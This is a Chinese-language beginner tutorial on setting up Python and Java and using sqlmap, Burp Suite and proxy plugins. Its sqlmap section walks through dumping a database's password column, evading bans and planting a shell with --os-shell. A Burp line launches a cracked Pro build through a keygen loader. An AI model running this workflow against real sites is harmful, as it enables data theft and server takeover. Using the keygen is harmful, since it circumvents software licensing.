一、环境的安装
1、Python
Python(2.7.16)下载地址
下载好文件之后,直接安装即可
2、Java
Java下载地址
3、环境变量
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,如果定义了某个环境变量的路径,那么当在windows系统的变量中寻找不到的时候,就会去添加的路径中寻找对应的东西。
例如,将桌面(C:\Users\ASUS\Desktop)加入环境变量,就可以在任意路径的cmd窗口打开桌面的文件
可以将Python和Java添加入环境变量,方便使用命令行访问。
二、sqlmap
sqlmap 是使用最为广泛的自动化检测、利用SQL注入的渗透测试工具,支持多种数据库。
下载好后直接解压,并加入环境变量,就可以直接在cmd调用
#常用指令
-u #指定注入点
--dbs #跑库名
--tables #跑表名
--columns #跑字段名
--dump #枚举数据(危险,不要轻易使用)
-D #指定库
-T #指定表
-C #指定字段
--random-agent #选择随机请求头(user-agents),一定程度上防止被禁
--delay=1 #每次探测延时超过1秒,防止访问过快被禁
--count #查看数据量
--proxy "http://127.0.0.1:1080" #使用本地1080端口
--level #1-5测试等级,等级越高检测越详细,level大于2会检测cookie注入,大于3会检测头注入,一般使用等级3
--risk #与level类似,但测试语句更丰富,可与level搭配使用,level主要测试传参
--is-dba #查询当前用户权限,如果DBA是True可以尝试直接拿webshell
--os-shell #尝试往网站中放入一个cmdshell(拥有cmd权限的shell),先选择写入shell的脚本语言
--flush-session #清楚缓存,防止网站漏洞更新,出现差错
--batch #不建议使用,所有的选项走默认选项,可能出错
例如,找到一个存在SQL注入的网站http://59.1.1.1:8003/?id=1
python sqlmap.py -u http://59.1.1.1:8003/?id=1
#使用流程
#探测是否存在注入点
python sqlmap.py -u http://59.1.1.1:8003/?id=1
#跑库名
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --dbs
#指定库名,输出表名
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 --tables
#指定库名、表名,输出字段名及其类型
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --columns
#指定库名、表名、字段名,输出数据
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 -C password --dump
#指定库名、表名,直接输出数据
#脱库,如果没有获得授权,则为非法获取数据库里的信息
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --dump
#1秒发送1个数据包,随机请求头
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --delay=1 --random-agent --dump
#查询数据量
python sqlmap.py -u http://59.1.1.1:8003/?id=1 -D 库名 -T 表名 --count
#使用等级3进行测试
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --level 3
#常用的渗透测试语句
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --level 3 --risk 2
#查询当前用户权限,如果权限为False,则权限不够,权限为True,则可以直接拿webshell
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --is-dba
#如果权限为True,尝试往网站中放入一个cmdshell(拥有cmd权限的shell),先选择写入shell的脚本语言
#当然,能够直接getshell的网站很少
python sqlmap.py -u http://59.1.1.1:8003/?id=1 --os-shell
#拿到webshell之后,常用的cmd命令
whoami #得到的系统权限,例如nt authority\system为最高权限
dir #查看当前目录
systeminfo #查看详细信息
三、Burp Suite
Burp Suite 是用于攻击web应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP消息、持久性、认证、代理、日志、警报。
此处不详细介绍Burp Suite的安装、运行、操作。
#如果补丁失效,通过cmd命令行直接运行Burp Suite
javaw -jar burpsuite_pro_v1.7.30.jar
java -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v1.7.30.jar
证书的安装:
(1)访问监听的端口
(2)下载证书
(3)导入证书,重启浏览器即可
代理:将信息发送给中间人,由中间人发送出去
发送方 -> 中间人(Burp) -> 接收方
简单操作:抓包,抓返回包,单放包,查看返回包
抓包:拦截数据包
放包
四、谷歌浏览器插件
浏览器插件其实就是浏览器的扩展,360浏览器的极速模式使用了谷歌内核,所以兼容谷歌浏览器插件。
插件可以帮助我们更好的对浏览器进行操作,例如Proxy SwitchySharp插件可以帮助我们快速的使用代理。